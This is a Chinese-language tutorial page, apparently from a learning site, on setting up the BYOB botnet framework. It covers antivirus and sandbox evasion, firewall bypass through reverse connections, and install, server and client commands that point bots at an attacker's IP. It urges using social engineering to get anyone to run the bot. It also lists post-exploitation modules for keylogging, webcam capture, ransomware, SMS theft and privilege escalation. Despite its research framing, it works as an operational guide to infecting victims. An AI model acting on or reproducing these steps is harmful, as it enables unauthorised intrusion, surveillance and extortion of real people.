構建你自己的殭屍網路

BYOB 為安全研究人員和開發者提供了一個框架,用於構建和操作一個基本的殭屍網路,以加深他們對每年感染數百萬裝置併產生現代殭屍網路的複雜惡意軟體的理解,從而提高他們開發針對這些威脅的對策的能力。它的設計允許開發者輕鬆地實現他們自己的程式碼並新增酷炫的新功能,而無需從頭開始編寫遠端管理工具 (RAT) 或指揮控制伺服器。

特性

  • 不寫入磁碟 − 客戶端從不向磁碟寫入任何內容 - 甚至不是臨時檔案,因為遠端匯入允許將任意程式碼動態載入到記憶體中,並直接匯入到當前正在執行的程序中。

  • 平臺無關性 − 所有內容都使用 Python 編寫,生成的客戶端可以選擇編譯成可移植可執行檔案 (Windows) 或捆綁到獨立應用程式中。

  • 繞過防火牆 − 客戶端透過反向 TCP 連線連線到命令和控制伺服器,這將繞過大多數防火牆,因為預設過濾器配置主要阻止傳入連線。

  • 針對反病毒軟體的對策 − 透過阻止名稱為已知反病毒產品程序的生成來避免被反病毒軟體分析。

  • 加密有效負載以防止分析 − 主客戶端有效負載使用僅存在於與其一起生成的有效負載暫存器中的隨機 256 位金鑰進行加密。

  • 防止逆向工程 − 預設情況下,如果檢測到虛擬機器或沙箱,客戶端將中止執行。

如何安裝

  • git clone https://github.com/malwaredllc/byob.git

  • cd byob

  • pip install -r requirements.txt

  • python setup.py

    這裡將使用兩個終端;第一個終端將是殭屍網路伺服器,用於處理會話;第二個終端將是殭屍網路客戶端,用於建立殭屍。

  • python server.py –port 445

    然後開啟另一個 Linux 終端並輸入 cd /home/cybersecurity/Downloads/byob/byob

  • python client.py –name testbot.py 192.168.1.10(攻擊者IP) 445

執行上述查詢後,將建立一個新的殭屍網路。上述查詢將執行。現在,您可以使用任何社會工程技巧讓任何人開啟他們計算機中的殭屍程式。當 testbot.py 在目標機器上執行時,將在殭屍網路伺服器中建立一個會話。

漏洞利用後

在受害者成功配置殭屍網路後,客戶端可以遠端匯入這些漏洞利用後模組。

  • 鍵盤記錄器 (byob.modules.keylogger): 記錄使用者的按鍵和輸入的視窗名稱

  • 螢幕截圖 (byob.modules.screenshot): 拍攝當前使用者的桌面螢幕截圖

  • 網路攝像頭 (byob.modules.webcam): 檢視即時流或從網路攝像頭捕獲影像/影片

  • 勒索軟體 (byob.modules.ransom): 加密檔案併為贖金支付生成隨機 BTC 錢包

  • 資料包嗅探器 (byob.modules.packetsniffer): 在主機網路上執行資料包嗅探器並上傳 .pcap 檔案

  • 永續性 (byob.modules.persistence): 在主機上建立永續性

  • 手機 (byob.modules.phone): 讀取/搜尋/上傳來自客戶端智慧手機的簡訊

  • 提升許可權 (byob.modules.escalate): 嘗試繞過 UAC 以獲得未經授權的管理員許可權

  • 埠掃描器 (byob.modules.portscanner): 掃描本地網路以查詢其他線上裝置和開放埠

  • 程序控制 (byob.modules.process): 列出/搜尋/終止/監視主機上當前執行的程序

更新於:2020年9月29日

8K+ 次瀏覽

啟動你的 職業生涯

透過完成課程獲得認證

開始
廣告